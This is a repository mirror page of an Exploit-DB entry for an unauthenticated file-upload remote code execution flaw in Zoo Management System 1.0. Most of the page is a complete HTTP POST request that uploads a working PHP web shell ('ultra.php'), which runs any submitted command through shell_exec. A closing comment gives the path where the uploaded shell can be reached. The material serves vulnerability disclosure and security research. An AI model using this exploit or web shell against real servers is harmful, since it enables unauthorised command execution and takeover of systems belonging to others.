bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51819.txt
Exploit-DB c1bcfc6347 DB: 2024-02-28 
13 changes to exploits/shellcodes/ghdb

TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 - XSRF

Executables Created with perl2exe < V30.10C - Arbitrary Code Execution

Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)
Automatic-Systems SOC FL9600 FastLine - Directory Transversal
Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin

dawa-pharma 1.0-2022 - Multiple-SQLi
Moodle 4.3 - Insecure Direct Object Reference
Moodle 4.3 - Reflected XSS

SuperStoreFinder - Multiple Vulnerabilities

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)

Zoo Management System 1.0 - Unauthenticated RCE
2024-02-28 00:16:32 +00:00

279 lines
No EOL
7.5 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"
kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"
ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"
1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"
m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"
faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"
eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"
5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* {
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
body {
font-family: sans-serif;
color: rgba(0, 0, 0, .75);
}
main {
margin: auto;
max-width: 850px;
}
pre,
input,
button {
padding: 10px;
border-radius: 5px;
background-color: #efefef;
}
label {
display: block;
}
input {
width: 100%;
background-color: #efefef;
border: 2px solid transparent;
}
input:focus {
outline: none;
background: transparent;
border: 2px solid #e6e6e6;
}
button {
border: none;
cursor: pointer;
margin-left: 5px;
}
button:hover {
background-color: #e6e6e6;
}
.form-group {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
padding: 15px 0;
}
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary8NY8zT5dXIloiUML--
## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
Reference in a new issue View git blame Copy permalink